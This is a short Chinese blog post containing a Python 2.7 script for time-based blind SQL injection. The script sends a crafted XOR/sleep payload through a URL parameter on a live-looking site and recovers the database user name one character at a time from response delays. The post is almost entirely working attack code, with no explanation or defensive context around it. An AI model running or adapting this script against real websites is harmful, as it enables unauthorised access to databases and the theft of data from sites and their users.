酷帥王子'blog-思想激进者,一搞网络安全的市井小儿,随波逐流之辈也!

python27编写时间盲注脚本

2019-9-29 10:01 作者:酷帥王子 | python网络安全 |

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time

payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.%'

user=''
print('Start to retrive current user:')
for i in range(1,23):
	for payload in payloads:
		try:
			url = "http://www.9kb.org/com_hk_list.htm?scat=if(now()=sysdate(),sleep(0),0)/*'XOR(if(ascii(substring(user()," + str(i) + ",1))=" + str(ord(payload)) + ",sleep(2),0))OR'\"XOR(if(now()=sysdate(),sleep(0),0))OR\"*/"
			response=requests.get(url, timeout=10)
		except requests.exceptions.ReadTimeout:
			user += payload
			print('user is:', user)
			break
print('\n[Done] current user is %s' % user)

文章作者:酷帥王子
文章地址:https://9kb.org:443/post-111.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



Powered by 酷帥王子

CopyRight © 2009-2016 酷帥王子'blog.  All rights reserved.